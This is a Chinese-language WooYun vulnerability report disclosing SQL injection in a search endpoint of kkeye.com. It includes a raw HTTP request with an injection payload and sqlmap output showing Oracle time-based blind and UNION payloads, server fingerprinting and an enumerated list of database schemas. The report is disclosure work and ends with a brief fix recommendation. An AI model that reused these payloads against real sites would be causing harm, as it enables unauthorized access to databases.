漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0136584
漏洞标题:KKeYe开眼数据官网SQL注入漏洞
相关厂商:kkeye.com
漏洞作者: Ourgame简单
提交时间:2015-08-25 11:12
修复时间:2015-08-30 11:14
公开时间:2015-08-30 11:14
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
使用WVS 扫描,扫了很久啊。
注入点藏的真深啊。
欠下的,总是要还的。
漏洞证明:
受影响的URL地址:
http://www.kkeye.com/web/kkeyedata/SearchAgents.ashx?condition=XXXX&type=3
注入点:condition=
==============================================================
GET /web/kkeyedata/SearchAgents.ashx?condition=-1'%20OR%203*2*1%3d6%20AND%20000419%3d000419%20--%20&t=1440401077705&type=3 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: www.kkeye.com
Cookie: BIGipServerweb4=252378743.20480.0000; ASP.NET_SessionId=tjx5ya2e0sl2iy55k5dvky45; __utma=182231485.1766062854.1440401067.1440401067.1440401067.1; __utmb=182231485; __utmc=182231485; __utmz=182231485.1440401067.1.1.utmccn=(referral)|utmcsr=acunetix-referrer.com|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")|utmcmd=referral
Host: www.kkeye.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
=====================================================================
[15:58:07] [INFO] loading tamper script 'space2comment'
[15:58:08] [INFO] resuming back-end DBMS 'oracle'
[15:58:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: condition (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: condition=-1' AND 9940=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'JJeO'='JJeO&type=3
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: condition=-1' UNION ALL SELECT CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113)||CHR(67)||CHR(117)||CHR(121)||CHR(109)||CHR(81)||CHR(119)||CHR(104)||CHR(106)||CHR(102)||CHR(83)||CHR(113)||CHR(113)||CHR(112)||CHR(113)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &type=3
---
[15:58:08] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:58:08] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[15:58:08] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:58:08] [INFO] fetching database (schema) names
[15:58:08] [INFO] the SQL query used returns 8 entries
[15:58:08] [INFO] resumed: CTXSYS
[15:58:08] [INFO] resumed: EXFSYS
[15:58:08] [INFO] resumed: MDSYS
[15:58:08] [INFO] resumed: OLAPSYS
[15:58:08] [INFO] resumed: SYS
[15:58:08] [INFO] resumed: SYSTEM
[15:58:08] [INFO] resumed: WEBASP
[15:58:08] [INFO] resumed: WMSYS
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WEBASP
[*] WMSYS
修复方案:
进行相对应的过滤。
把SQL语句拼接改为占位符的格式。
版权声明:转载请注明来源 Ourgame简单@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-08-30 11:14
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无